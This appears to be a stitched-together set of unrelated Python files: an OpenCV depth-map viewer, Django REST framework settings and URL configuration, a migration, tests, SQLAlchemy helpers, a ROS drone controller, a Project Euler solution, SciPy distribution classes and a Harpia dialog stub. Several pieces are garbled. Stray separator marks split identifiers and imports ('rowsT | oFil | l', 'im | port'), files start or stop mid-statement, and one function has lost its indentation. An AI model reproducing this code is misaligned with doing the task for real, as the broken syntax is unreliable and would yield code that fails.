        cv2.imshow('left', left)
        cv2.imshow('right', right)
        cv2.imshow('depth', depth)

        depth = cv2.cvtColor(depth, cv2.COLOR_GRAY2BGR)
        res = cv2.addWeighted(left, 0.5, depth, 0.5, 0)
        cv2.imshow('res', res)

        k = cv2.waitKey(1) & 0xff
        if k == 27:  # ESC
            break
        elif k == ord('s'):
            cv2.imwrite('screen.png', img)

    cap.release()
    out.release()
    cv2.destroyAllWindows()


video_test('../../video/6.mp4', '../results/depth_map_out.avi')
|
"""
Settings for REST framework are all namespaced in the REST_FRAMEWORK setting.
For example your project's `settings.py` file might look like this:
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.YAMLRenderer',
)
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.YAMLParser',
)
}
This module provides the `api_settings` object, that is used to access
REST framework settings, checking for user settings first, then falling
back to the defaults.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils import importlib
from rest_framework import ISO_8601
from rest_framework.compat import six
USER_SETTINGS = getattr(settings, 'REST_FRAMEWORK', None)
DEFAULTS = {
# Base API policies
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
),
'DEFAULT_THROTTLE_CLASSES': (
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS':
'rest_framework.negotiation.DefaultContentNegotiation',
    # Generic view behavior
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.ModelSerializer',
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'rest_framework.pagination.PaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (),
# Throttling
'DEFAULT_THROTTLE_RATES': {
'user': None,
'anon': None,
},
# Pagination
'PAGINATE_BY': None,
'PAGINATE_BY_PARAM': None,
'MAX_PAGINATE_BY': None,
# Authentication
'UNAUTHENTICATED_USER': 'django.contrib.auth.models.AnonymousUser',
'UNAUTHENTICATED_TOKEN': None,
# View configuration
'VIEW_NAME_FUNCTION': 'rest_framework.views.get_view_name',
'VIEW_DESCRIPTION_FUNCTION': 'rest_framework.views.get_view_description',
# Exception handling
'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler',
# Testing
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer'
),
'TEST_REQUEST_DEFAULT_FORMAT': 'multipart',
# Browser enhancements
'FORM_METHOD_OVERRIDE': '_method',
'FORM_CONTENT_OVERRIDE': '_content',
'FORM_CONTENTTYPE_OVERRIDE': '_content_type',
'URL_ACCEPT_OVERRIDE': 'accept',
'URL_FORMAT_OVERRIDE': 'format',
'FORMAT_SUFFIX_KWARG': 'format',
# Input and output formats
'DATE_INPUT_FORMATS': (
ISO_8601,
),
'DATE_FORMAT': None,
'DATETIME_INPUT_FORMATS': (
ISO_8601,
),
'DATETIME_FORMAT': None,
'TIME_INPUT_FORMATS': (
ISO_8601,
),
'TIME_FORMAT': None,
# Pending deprecation
'FILTER_BACKEND': None,
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = (
'DEFAULT_RENDERER_CLASSES',
'DEFAULT_PARSER_CLASSES',
'DEFAULT_AUTHENTICATION_CLASSES',
'DEFAULT_PERMISSION_CLASSES',
'DEFAULT_THROTTLE_CLASSES',
'DEFAULT_CONTENT_NEGOTIATION_CLASS',
'DEFAULT_MODEL_SERIALIZER_CLASS',
'DEFAULT_PAGINATION_SERIALIZER_CLASS',
'DEFAULT_FILTER_BACKENDS',
'EXCEPTION_HANDLER',
'FILTER_BACKEND',
'TEST_REQUEST_RENDERER_CLASSES',
'UNAUTHENTICATED_USER',
'UNAUTHENTICATED_TOKEN',
'VIEW_NAME_FUNCTION',
'VIEW_DESCRIPTION_FUNCTION'
)
def perform_import(val, setting_name):
    """
    Resolve a setting that may be given in string import notation.

    A plain string is imported directly; a list/tuple is resolved
    element-wise. Any other value is returned untouched.
    """
    if isinstance(val, (list, tuple)):
        return [import_from_string(item, setting_name) for item in val]
    if isinstance(val, six.string_types):
        return import_from_string(val, setting_name)
    return val
def import_from_string(val, setting_name):
    """
    Resolve a dotted-path string to the attribute it names.

    Re-raises ImportError with a message that identifies the offending
    API setting.
    """
    try:
        # Nod to tastypie's use of importlib.
        parts = val.split('.')
        module_path = '.'.join(parts[:-1])
        class_name = parts[-1]
        module = importlib.import_module(module_path)
        return getattr(module, class_name)
    except ImportError as e:
        detail = "%s: %s" % (e.__class__.__name__, e)
        msg = "Could not import '%s' for API setting '%s'. %s." % (val, setting_name, detail)
        raise ImportError(msg)
class APISettings(object):
    """
    A settings object, that allows API settings to be accessed as
    properties. For example:

        from rest_framework.settings import api_settings
        print api_settings.DEFAULT_RENDERER_CLASSES

    Any setting given in string import notation is resolved to the actual
    class before being returned, and the result is cached on the instance.
    """
    def __init__(self, user_settings=None, defaults=None, import_strings=None):
        self.user_settings = user_settings or {}
        self.defaults = defaults or {}
        self.import_strings = import_strings or ()

    def __getattr__(self, attr):
        if attr not in self.defaults.keys():
            raise AttributeError("Invalid API setting: '%s'" % attr)

        # User-provided settings take precedence over the defaults.
        if attr in self.user_settings:
            val = self.user_settings[attr]
        else:
            val = self.defaults[attr]

        # Coerce dotted-path strings into the objects they name.
        if val and attr in self.import_strings:
            val = perform_import(val, attr)

        self.validate_setting(attr, val)

        # Cache on the instance so __getattr__ only runs once per setting.
        setattr(self, attr, val)
        return val

    def validate_setting(self, attr, val):
        if attr == 'FILTER_BACKEND' and val is not None:
            # Make sure we can initialize the class
            val()
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
|
# -*- coding: utf-8 -*-
# Generated by Django 1. | 10.5 on 2017-03-14 17:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: renames the ``picture`` field on the
    # ``volunteer`` model to ``avatar``. Schema-only rename; do not edit a
    # migration that may already have been applied.

    dependencies = [
        ('volunteers', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='volunteer',
            old_name='picture',
            new_name='avatar',
        ),
    ]
|
"""equinox_spring16_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import | include, url
from django.conf.urls.static import static
from django.contrib im | port admin
from rest_framework import routers
from equinox_api.views import ApplicationViewSet, OperationViewSet, InstancesViewSet, UserViewSet, ItemViewSet
from equinox_spring16_api import settings
# Register every viewset on one DRF router so each gets list/detail routes.
router = routers.DefaultRouter()
router.register(r'applications', ApplicationViewSet)
router.register(r'operations', OperationViewSet)
router.register(r'instances', InstancesViewSet)
router.register(r'items', ItemViewSet)
router.register(r'users', UserViewSet)

# Admin, API root and swagger docs; static() appends a static-files route
# (Django only serves these when DEBUG is on).
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^', include(router.urls)),
    url(r'^docs/', include('rest_framework_swagger.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
# -*- coding: utf-8 -*-
from __future__ | import unicode_literals
from privagal.core.utils import PrivagalTestCase
from ...gallery.factories import GalleryFactory, ImageFactory
class GalleryFactoryTestCase(PrivagalTestCase):
    # NOTE(review): ``self.timeline`` is presumably created by
    # PrivagalTestCase's setUp — confirm in privagal.core.utils.

    def test_images_given(self):
        """An explicitly passed image becomes the gallery's first image."""
        image = ImageFactory()
        gallery = GalleryFactory(images__images=[image])
        self.timeline.add_child(instance=gallery)
        self.assertEqual(gallery.images.first().image, image)

    def test_images_default(self):
        """By default the factory populates a gallery with 3 images."""
        gallery = GalleryFactory()
        self.assertEqual(gallery.images.count(), 3)
|
from sqlalchemy import and_
from DBtransfer import *
from zlib import *
# returns a compressed list
def generateFromDB(DBSession, InternData, tmp_name):
    """Collect the distinct run names of one upload (identified by its
    timestamp ``tmp_name``) and return them compressed.

    Order of first appearance is preserved; duplicates are dropped.
    """
    run_list = []
    user_data = DBSession.query(InternData).filter(InternData.timestamp == tmp_name)
    for data in user_data:
        # 'x not in y' instead of the previous 'not x in y'
        if data.run not in run_list:
            run_list.append(data.run)
    return compressList(run_list)
def getknown_runsAndrun_list(DBSession, Mass_specData, InternData, tmp_name):  # CR: rename to splitKnownAndTodo
    """Split the runs of an upload into those already stored in the DB and
    those still to be processed.

    Returns a tuple ``(known_runs, run_list)`` of uncompressed run names:
    ``known_runs`` are present in Mass_specData, ``run_list`` are not.
    """
    runs_in_upload = decompressList(generateFromDB(DBSession, InternData, tmp_name))
    # one IN-query instead of fetching all filenames and filtering in Python
    known_runs = [x.filename for x in
                  DBSession.query(Mass_specData).filter(Mass_specData.filename.in_(runs_in_upload))]
    run_list = [x for x in runs_in_upload if x not in known_runs]
    return (known_runs, run_list)
#input compressed
#output not compressed
def usedRuns(run_list, params):
    """Return the runs from the compressed ``run_list`` that occur in
    ``params`` (input compressed, output a plain list)."""
    # comprehension instead of the previous index-based append loop
    return [run for run in decompressList(run_list) if run in params]
# input not compressed
# output InternData objects
def rowsT | oFil | l(DBSession, InternData, tmp_name, used_runs) :
users_rows = getUserRows(DBSession, InternData, tmp_name)
rows = []
for row in users_rows :
if row.run in used_runs :
rows.append(row)
return rows
#input compressed, not compressed
def throughOutUsedRuns(run_list, used_runs):  # run_list compressed, used_runs not
    """Drop every run in ``used_runs`` from the compressed ``run_list``.

    Returns the remaining runs compressed again, or [] when none are left.
    Raises ValueError if a used run is not present (same as before).
    """
    remaining = decompressList(run_list)
    for run in used_runs:
        remaining.remove(run)
    return compressList(remaining) if remaining else []
#
def compressList(items):
    """zlib-compress a list of strings joined by the '$$' separator.

    The parameter was renamed from ``list`` (it shadowed the builtin);
    positional callers are unaffected. Works on both Python 2 (str is
    bytes) and Python 3 (explicit encode).
    """
    data = '$$'.join(items)
    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    return compress(data)
#input compressed
def decompressList(run_list):
    """Inverse of compressList: decompress and split on the '$$' separator.

    On Python 3 the bytes returned by zlib are decoded first; on Python 2
    ``decompress`` already returns ``str`` and nothing changes.
    """
    raw = decompress(run_list)
    if not isinstance(raw, str):
        raw = raw.decode('utf-8')
    return raw.split('$$')
|
#!/usr/bin/env python
'''======================================================
Created by: D. Spencer Maughan
Last updated: May 2015
File name: IRIS_DF_Controller.py
Organization: RISC Lab, Utah State University
Notes:
======================================================'''
import roslib; roslib.load_manifest('risc_msgs')
import rospy
from math import *
import numpy as np
import time
#=======================#
# Messages Needed #
#=======================#
from risc_msgs.msg import *
from std_msgs.msg import Bool
from roscopter.msg import Status
#=====================#
# Gain Matrices #
#=====================#
# LQR gain matrix mapping the 7-dim error state
# [x, y, z, xdot, ydot, zdot, psi] to the 4 control channels
# (see Basic_Controller: utilde = -K*X).
K = np.matrix([[ 1.8, 0, 0, 1.4, 0, 0, 0],\
               [ 0, 1.8, 0, 0, 1.4, 0, 0],\
               [ 0, 0, 3, 0, 0, 5, 0],\
               [ 0, 0, 0, 0, 0, 0,.5]])
#========================#
# Globals #
#========================#
nominal_thrust = 0 # thrust necessary to maintain hover given battery level
# scale/trim constants converting desired angles to commands
# (units/calibration source not visible here — confirm against the vehicle setup)
phi_scale = 3.053261127645355
phi_trim = 0.0#0.058941904209906
theta_scale = 3.815398742249453
theta_trim = 0.0#-0.091216767651723
ctrl_status = False
# latest motion-capture states and trajectory, updated by ROS callbacks
states = Cortex()
states.Obj = [States()]*1
traj = Trajectories()
traj.Obj = [Trajectory()]*1
euler_max = 45*np.pi/180
max_yaw_rate = .3490659 #in radians/sec
rate = 45 # Hz
image = 0
start_time = 0
#==================#
# Publishers #
#==================#
pub_ctrl = rospy.Publisher('/controls', Controls, queue_size = 1)
#========================#
# Get Cortex States #
#========================#
def GetStates(S):
    """ROS callback: cache the latest motion-capture (Cortex) states."""
    global states
    states = S
#=====================#
# Get Trajectory #
#=====================#
def GetTraj(S):
    """ROS callback: cache the latest reference trajectory."""
    global traj
    traj = S
#=========================#
# Get Battery Status #
#=========================#
def GetBatt(S):
    """ROS callback: update the hover-thrust estimate from battery level.

    Evaluates a quartic fit of nominal hover thrust vs. remaining battery
    percentage.
    """
    global nominal_thrust
    B = S.battery_remaining
    # coefficients for fourth order fit
    # determined 11 May 2015 by Spencer Maughan and Ishmaal Erekson
    c0 = 0.491674747062374
    c1 = -0.024809293286468
    c2 = 0.000662710609466
    c3 = -0.000008160593348
    c4 = 0.000000033699651
    nominal_thrust = c0+c1*B+c2*B**2+c3*B**3+c4*B**4
#============================#
# Get Controller Status #
#============================#
def GetStatus(S):
    """ROS callback: cache the controller enable/disable flag."""
    global ctrl_status
    ctrl_status = S.data
#========================#
# Basic Controller #
#========================#
def Basic_Controller():
    """Compute and publish attitude/thrust commands for the IRIS.

    Compares the newest trajectory point with the newest motion-capture
    state, applies the LQR gain K to the error state, rotates the result
    into the vehicle-1 frame and publishes a Controls message on /controls.
    Does nothing unless the tracked object is currently visible.
    """
    global states, euler_max, max_yaw_rate, pub_ctrl,K,traj
    Ctrl = Controls()
    Ctrl.Obj = [Control()]*1
    Ctrl.header.stamp = states.header.stamp
    g = 9.80665 # average value of earth's gravitational constant m/s^2
    m = 1.282 # IRIS mass in kg  (NOTE(review): currently unused)

    #===================================#
    #    Get State Trajectory Errors    #
    #===================================#

    if states.Obj[0].visible:
        # error state: position (3), velocity (3), heading (1);
        # cortex angles arrive in degrees, hence the pi/180
        X = np.asmatrix(np.zeros((7,1)))
        X[0] = traj.Obj[0].x-states.Obj[0].x
        X[1] = traj.Obj[0].y-states.Obj[0].y
        X[2] = traj.Obj[0].z-states.Obj[0].z
        X[3] = traj.Obj[0].xdot-states.Obj[0].u
        X[4] = traj.Obj[0].ydot-states.Obj[0].v
        X[5] = traj.Obj[0].zdot-states.Obj[0].w
        X[6] = traj.Obj[0].psi-states.Obj[0].psi*np.pi/180

        #============================================#
        #     Differential Flatness Control Input    #
        #============================================#

        # LQR input
        utilde = -K*X
        # required input (feed-forward term, currently zero) minus gravity
        u_r = np.asmatrix(np.zeros((4,1)))
        u = utilde+u_r-np.matrix([[0],[0],[9.81],[0]])

        #==================================#
        #     Rotate to Vehicle 1 Frame    #
        #==================================#

        psi = states.Obj[0].psi*np.pi/180
        rotZ = np.matrix([[cos(psi), sin(psi), 0],[-sin(psi), cos(psi), 0],[0, 0, 1]])
        Cart = np.matrix([[1, 0, 0],[0, -1, 0],[0, 0, -1]])
        u[:-1] = Cart*rotZ*u[:-1]

        #===================================#
        #     Normalize given the Thrust    #
        #===================================#

        T = sqrt(u[0:3].T*u[0:3])
        u[:-1] = np.divide(u[:-1],-T)

        #==================#
        #   Set Controls   #
        #==================#

        # Controls for Ardrone
        # -phi = right... +phi = left
        # -theta = back... +theta = forward
        # -psi = right... +psi = left
        global phi_trim,theta_trim,phi_scale,theta_scale
        phi_d = (asin(u[1,-1]))
        theta_d = (-asin(u[0,-1]))
        ctrl = Control()
        ctrl.name = states.Obj[0].name
        ctrl.phi = phi_trim + phi_scale*phi_d
        ctrl.theta = theta_trim + theta_scale*theta_d
        ctrl.psi = -u[3,-1]/max_yaw_rate
        global nominal_thrust
        # thrust command: hover thrust plus normalized excess over gravity
        T_d = nominal_thrust+(T-g)/g
        ctrl.T = T_d
        Ctrl.Obj[0] = ctrl
        Ctrl.header = states.header
        #rospy.loginfo("latency = %f",states.header.stamp.to_sec()-rospy.get_time())
        pub_ctrl.publish(Ctrl)
#===================#
# Main #
#===================#
if __name__=='__main__':
    import sys
    rospy.init_node('IRIS_DF_Controller')

    #=====================================#
    #    Set up Publish/Subscribe Loop    #
    #=====================================#
    # Subscribers are registered ONCE, before the loop. The previous code
    # re-created all four subscribers on every iteration of the 45 Hz loop,
    # registering new callbacks with the ROS master each time.
    sub_cortex = rospy.Subscriber('/cortex_raw' , Cortex, GetStates, queue_size=1, buff_size=2**24)
    sub_traj = rospy.Subscriber('/trajectory' , Trajectories, GetTraj, queue_size=1, buff_size=2**24)
    sub_Batt = rospy.Subscriber('/apm/status' , Status, GetBatt)
    sub_status = rospy.Subscriber('/controller_status' , Bool, GetStatus)

    r = rospy.Rate(rate)
    while not rospy.is_shutdown():
        Basic_Controller()
        r.sleep()
|
#!/usr/bin/env python
# coding=utf-8
# Python Script
#
# Copyleft © Manoel Vilela
#
#
from functools import reduce
"""
Digit fifth powers
Problem 30
Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:
1634 = 1^4 + 6^4 + 3^4 + 4^4
8208 = 8^4 + 2^4 + 0^4 + 8^4
9474 = 9^4 + 4^4 + 7^4 + 4^4
As 1 = 14 is not a sum it is not included.
The sum of these numbers is 1634 + 8208 + 9474 = 19316.
Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.
"""
""" Proof, by someone on the Project Euler forum, that it is only necessary to consider numbers with 6 digits or fewer.
Proof that one need only consider numbers 6 digits or less:
If N has n digits, then 10^{n-1} <= N.
If N is the sum of the 5th powers of its | digits, N <= n*9^5. Thus, 10^{n-1} <= n*9^5.
We now show by induction that if n>=7, then 10^{n-6} > n.
1) Basis step (n=7): 10^{7-6} = 10 > 7.
2) Induction step: suppose 10^{n-6} > n for some n>=7. Show this true for n+1 too. Well,
10^{(n+1)-6} = 10*10^{n-6} > 10n > 2n > n+1
QED.
It follows that if n>=7, then
10^{n-1} = 10^{n-6}*10^5 > n * 10^5 > n*9^5.
Hence the only way we can have 10^{n-1} <= n*9^5 is for n<=6.
"""
# This part was mostly luck.
# Initially I tried to derive a search limit (it would be size*9**5), but I could not deduce the largest possible size.
# So I ran a few experiments and found that the numbers expressible as a sum of fifth powers of their digits
# all occur for sizes in the interval [4, 7).
from itertools import combinations_with_replacement as c
from string import digits as d

# n: does `num` consist of exactly the digits in `digits` (in any order)?
n = lambda num, digits: sorted(str(num)) == sorted(digits)
# p: sum of the fifth powers of a combination of digit characters
p = lambda comb: sum([int(n) ** 5 for n in comb])

# Digit order never affects the power sum, so it suffices to enumerate digit
# *combinations* of size 0..6 and keep every sum that is a permutation of
# the combination it came from.
matches = set()
for size in range(7):
    for combo in c(d, size):
        value = p(combo)
        if n(value, combo):
            matches.add(value)
print(sum(matches))
re(c > 1.0, e1, np.nan)
mu2_if_c = e2 - mu**2
mu2 = np.where(c > 2.0, mu2_if_c, np.nan)
g1 = _lazywhere(
c > 3.0,
(c, e1, e2, e3, mu2_if_c),
lambda c, e1, e2, e3, mu2_if_c: (e3 - 3*e2*e1 + 2*e1**3) / np.sqrt((mu2_if_c)**3),
fillvalue=np.nan)
g2 = _lazywhere(
c > 4.0,
(c, e1, e2, e3, e4, mu2_if_c),
lambda c, e1, e2, e3, e4, mu2_if_c: (
((e4 - 4*e3*e1 + 6*e2*e1**2 - 3*e1**4) / mu2_if_c**2) - 3),
fillvalue=np.nan)
return mu, mu2, g1, g2
def _munp(self, n, c, d):
    """Raw moments of the Burr III distribution.

    Entries where the moment does not exist (c <= n, or NaN inputs)
    come back as NaN via _lazywhere's fillvalue.
    """
    def __munp(n, c, d):
        nc = 1. * n / c
        return d * sc.beta(1.0 - nc, d + nc)
    n, c, d = np.asarray(n), np.asarray(c), np.asarray(d)
    # the (n == n) and (d == d) terms filter out NaN inputs
    return _lazywhere((c > n) & (n == n) & (d == d), (c, d, n),
                      lambda c, d, n: __munp(n, c, d),
                      np.nan)
burr = burr_gen(a=0.0, name='burr')
class burr12_gen(rv_continuous):
    r"""A Burr (Type XII) continuous random variable.

    %(before_notes)s

    See Also
    --------
    fisk : a special case of either `burr` or `burr12` with ``d=1``
    burr : Burr Type III distribution

    Notes
    -----
    The probability density function for `burr` is:

    .. math::

        f(x, c, d) = c d x^{c-1} / (1 + x^c)^{d + 1}

    for :math:`x >= 0` and :math:`c, d > 0`.

    `burr12` takes ``c`` and ``d`` as shape parameters for :math:`c`
    and :math:`d`.

    This is the PDF corresponding to the twelfth CDF given in Burr's list;
    specifically, it is equation (20) in Burr's paper [1]_.

    %(after_notes)s

    The Burr type 12 distribution is also sometimes referred to as
    the Singh-Maddala distribution from NIST [2]_.

    References
    ----------
    .. [1] Burr, I. W. "Cumulative frequency functions", Annals of
       Mathematical Statistics, 13(2), pp 215-232 (1942).

    .. [2] https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/b12pdf.htm

    .. [3] "Burr distribution",
       https://en.wikipedia.org/wiki/Burr_distribution

    %(example)s

    """
    def _pdf(self, x, c, d):
        # burr12.pdf(x, c, d) = c * d * x**(c-1) * (1+x**(c))**(-d-1)
        # evaluated in log space for numerical stability
        return np.exp(self._logpdf(x, c, d))

    def _logpdf(self, x, c, d):
        # xlogy / xlog1py keep the x == 0 endpoint well-defined
        return np.log(c) + np.log(d) + sc.xlogy(c - 1, x) + sc.xlog1py(-d-1, x**c)

    def _cdf(self, x, c, d):
        # cdf = 1 - sf, via expm1 of the log-survival for accuracy
        return -sc.expm1(self._logsf(x, c, d))

    def _logcdf(self, x, c, d):
        return sc.log1p(-(1 + x**c)**(-d))

    def _sf(self, x, c, d):
        # sf(x) = (1 + x**c)**(-d)
        return np.exp(self._logsf(x, c, d))

    def _logsf(self, x, c, d):
        return sc.xlog1py(-d, x**c)

    def _ppf(self, q, c, d):
        # The following is an implementation of
        #   ((1 - q)**(-1.0/d) - 1)**(1.0/c)
        # that does a better job handling small values of q.
        return sc.expm1(-1/d * sc.log1p(-q))**(1/c)

    def _munp(self, n, c, d):
        # n-th raw moment: d * B(1 + n/c, d - n/c)
        nc = 1. * n / c
        return d * sc.beta(1.0 + nc, d - nc)
burr12 = burr12_gen(a=0.0, name='burr12')
class fisk_gen(burr_gen):
    r"""A Fisk continuous random variable.

    The Fisk distribution is also known as the log-logistic distribution.

    %(before_notes)s

    Notes
    -----
    The probability density function for `fisk` is:

    .. math::

        f(x, c) = c x^{-c-1} (1 + x^{-c})^{-2}

    for :math:`x >= 0` and :math:`c > 0`.

    `fisk` takes ``c`` as a shape parameter for :math:`c`.

    `fisk` is a special case of `burr` or `burr12` with ``d=1``.

    %(after_notes)s

    See Also
    --------
    burr

    %(example)s

    """
    # Every method delegates to the module-level Burr III instance with the
    # second shape parameter pinned at d = 1.
    def _pdf(self, x, c):
        # fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
        return burr._pdf(x, c, 1.0)

    def _cdf(self, x, c):
        return burr._cdf(x, c, 1.0)

    def _sf(self, x, c):
        return burr._sf(x, c, 1.0)

    def _logpdf(self, x, c):
        # fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
        return burr._logpdf(x, c, 1.0)

    def _logcdf(self, x, c):
        return burr._logcdf(x, c, 1.0)

    def _logsf(self, x, c):
        return burr._logsf(x, c, 1.0)

    def _ppf(self, x, c):
        return burr._ppf(x, c, 1.0)

    def _munp(self, n, c):
        return burr._munp(n, c, 1.0)

    def _stats(self, c):
        return burr._stats(c, 1.0)

    def _entropy(self, c):
        # closed form: 2 - log(c)
        return 2 - np.log(c)
fisk = fisk_gen(a=0.0, name='fisk')
# median = loc
class cauchy_gen(rv_continuous):
    r"""A Cauchy continuous random variable.

    %(before_notes)s

    Notes
    -----
    The probability density function for `cauchy` is

    .. math::

        f(x) = \frac{1}{\pi (1 + x^2)}

    for a real number :math:`x`.

    %(after_notes)s

    %(example)s

    """
    def _pdf(self, x):
        # density 1 / (pi * (1 + x**2)); x*x avoids a power call
        one_plus_x2 = 1.0+x*x
        return 1.0/np.pi/one_plus_x2

    def _cdf(self, x):
        angle = np.arctan(x)
        return 0.5 + 1.0/np.pi*angle

    def _sf(self, x):
        angle = np.arctan(x)
        return 0.5 - 1.0/np.pi*angle

    def _ppf(self, q):
        return np.tan(np.pi*q-np.pi/2.0)

    def _isf(self, q):
        return np.tan(np.pi/2.0-np.pi*q)

    def _stats(self):
        # the Cauchy distribution has no finite moments
        return np.nan, np.nan, np.nan, np.nan

    def _entropy(self):
        return np.log(4*np.pi)

    def _fitstart(self, data, args=None):
        # Initialize ML guesses using quartiles instead of moments:
        # median for loc, half the IQR for scale.
        p25, p50, p75 = np.percentile(data, [25, 50, 75])
        return p50, (p75 - p25)/2
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
    r"""A chi continuous random variable.

    %(before_notes)s

    Notes
    -----
    The probability density function for `chi` is:

    .. math::

        f(x, k) = \frac{1}{2^{k/2-1} \Gamma \left( k/2 \right)}
                   x^{k-1} \exp \left( -x^2/2 \right)

    for :math:`x >= 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
    in the implementation). :math:`\Gamma` is the gamma function
    (`scipy.special.gamma`).

    Special cases of `chi` are:

        - ``chi(1, loc, scale)`` is equivalent to `halfnorm`
        - ``chi(2, 0, scale)`` is equivalent to `rayleigh`
        - ``chi(3, 0, scale)`` is equivalent to `maxwell`

    `chi` takes ``df`` as a shape parameter.

    %(after_notes)s

    %(example)s

    """
    def _rvs(self, df):
        # a chi variate is the square root of a chi-squared variate
        sz, rndm = self._size, self._random_state
        return np.sqrt(chi2.rvs(df, size=sz, random_state=rndm))

    def _pdf(self, x, df):
        #                   x**(df-1) * exp(-x**2/2)
        # chi.pdf(x, df) =  -------------------------
        #                   2**(df/2-1) * gamma(df/2)
        # evaluated in log space for numerical stability
        return np.exp(self._logpdf(x, df))

    def _logpdf(self, x, df):
        l = np.log(2) - .5*np.log(2)*df - sc.gammaln(.5*df)
        return l + sc.xlogy(df - 1., x) - .5*x**2

    def _cdf(self, x, df):
        # regularized lower incomplete gamma at (df/2, x**2/2)
        return sc.gammainc(.5*df, .5*x**2)

    def _ppf(self, q, df):
        return np.sqrt(2*sc.gammaincinv(.5*df, q))

    def _stats(self, df):
        # closed-form mean/variance/skew/kurtosis in terms of gamma ratios
        mu = np.sqrt(2)*sc.gamma(df/2.0+0.5)/sc.gamma(df/2.0)
        mu2 = df - mu*mu
        g1 = (2*mu**3.0 + mu*(1-2*df))/np.asarray(np.power(mu2, 1.5))
        g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
        g2 /= np.asarray(mu2**2.0)
        return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
r"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is:
.. math::
f(x, k) = \frac{1}{2^{k/2} \Gamma \left( k/2 \right)}
x^{k/2-1} \exp \left( -x/2 \right)
for :math:`x > 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation).
`chi2` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
# chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return sc.xlogy(df/2.-1, x) - x/2. - sc.gam |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
    """Property dialog for the 'Run Command' block: lets the user edit the
    shell command string and the run-only-when-input-isn't-zero flag."""
    # ----------------------------------------------------------------------
    def __init__(self, PropertiesXML, S2iBlockProperties):
        # Load the glade UI, then populate the widgets from the block's XML.
        self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
        filename = self.m_sDataDir + 'glade/runCmd.ui'
        self.m_oPropertiesXML = PropertiesXML
        self.m_oS2iBlockProperties = S2iBlockProperties

        widget_list = [
            'Properties',
            'cmdString',
            'BackgroundColor',
            'BorderColor',
            'HelpView',
